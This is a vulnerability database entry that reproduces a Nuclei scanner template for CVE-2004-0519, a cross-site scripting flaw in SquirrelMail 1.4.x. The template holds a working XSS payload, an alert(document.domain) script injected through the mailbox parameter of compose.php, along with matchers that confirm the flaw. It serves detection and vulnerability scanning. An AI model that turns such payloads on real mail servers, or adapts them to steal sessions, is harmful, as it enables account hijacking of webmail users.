SquirrelMail 1.4.x - Folder Name Cross-Site Scripting

🗓️ 11 Jun 2026 03:33:20Reported by ProjectDiscoveryType

SquirrelMail 1.4.x XSS Vulnerabilit

Reporter	Title	Published	Views	Family All 27
Tenable Nessus	SquirrelMail < 1.4.3 Multiple Vulnerabilities	20 Aug 200400:00	–	nessus
Tenable Nessus	Debian DSA-535-1 : squirrelmail - several vulnerabilities	29 Sep 200400:00	–	nessus
Tenable Nessus	Fedora Core 1 : squirrelmail-1.4.3-0.f1.1 (2004-159)	23 Jul 200400:00	–	nessus
Tenable Nessus	Fedora Core 2 : squirrelmail-1.4.3-1 (2004-160)	23 Jul 200400:00	–	nessus
Tenable Nessus	FreeBSD : 'Content-Type' XSS vulnerability affecting other webmail systems (25)	6 Jul 200400:00	–	nessus
Tenable Nessus	FreeBSD : 'Content-Type' XSS vulnerability affecting other webmail systems (c5519420-cec2-11d8-8898-000d6111a684)	23 Apr 200900:00	–	nessus
Tenable Nessus	GLSA-200405-16 : Multiple XSS Vulnerabilities in SquirrelMail	30 Aug 200400:00	–	nessus
Tenable Nessus	RHEL 3 : squirrelmail (RHSA-2004:240)	6 Jul 200400:00	–	nessus
Tenable Nessus	SquirrelMail < 1.4.3 Multiple Vulnerabilities	5 May 200400:00	–	nessus
FreeBSD	"Content-Type" XSS vulnerability affecting other webmail systems	29 May 200400:00	–	freebsd

Source	Link
exploit-db	www.exploit-db.com/exploits/24068
security	www.security.gentoo.org/glsa/glsa-200405-16.xml
patches	www.patches.sgi.com/support/free/security/advisories/20040604-01-U.asc
distro	www.distro.conectiva.com.br/atualizacoes/
marc	www.marc.info/

id: CVE-2004-0519

info:
  name: SquirrelMail 1.4.x - Folder Name Cross-Site Scripting
  author: dhiyaneshDk
  severity: medium
  description: Multiple cross-site scripting (XSS) vulnerabilities in SquirrelMail 1.4.2 allow remote attackers to execute arbitrary script and possibly steal authentication information via multiple attack vectors, including the mailbox parameter in compose.php.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to session hijacking, phishing attacks, or defacement of the SquirrelMail interface.
  remediation: Upgrade to the latest version.
  reference:
    - https://www.exploit-db.com/exploits/24068
    - http://security.gentoo.org/glsa/glsa-200405-16.xml
    - ftp://patches.sgi.com/support/free/security/advisories/20040604-01-U.asc
    - http://distro.conectiva.com.br/atualizacoes/?id=a&anuncio=000858
    - http://marc.info/?l=bugtraq&m=108334862800260
  classification:
    cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:P/I:P/A:P
    cvss-score: 6.8
    cve-id: CVE-2004-0519
    cwe-id: NVD-CWE-Other
    epss-score: 0.00189
    epss-percentile: 0.40577
    cpe: cpe:2.3:a:sgi:propack:3.0:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: sgi
    product: propack
  tags: cve,cve2004,squirrelmail,edb,xss,sgi,vuln

http:
  - method: GET
    path:
      - '{{BaseURL}}/mail/src/compose.php?mailbox=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "</script><script>alert(document.domain)</script>"

      - type: word
        part: header
        words:
          - "text/html"

      - type: status
        status:
          - 200
# digest: 490a004630440220774b4b06259c725e61d2b23184d62071271b7530793fbd79ad9f63ce46db352802200fd20dc17a10e72cd66d6cd540df1cc2968addbb6bb4cd29e86f736d02b6ed77:922c64590222798bb761d5b6d8e72950

04 Feb 2026 07:00Current

5.7Medium risk

Vulners AI Score5.7

CVSS 26.8

EPSS0.00189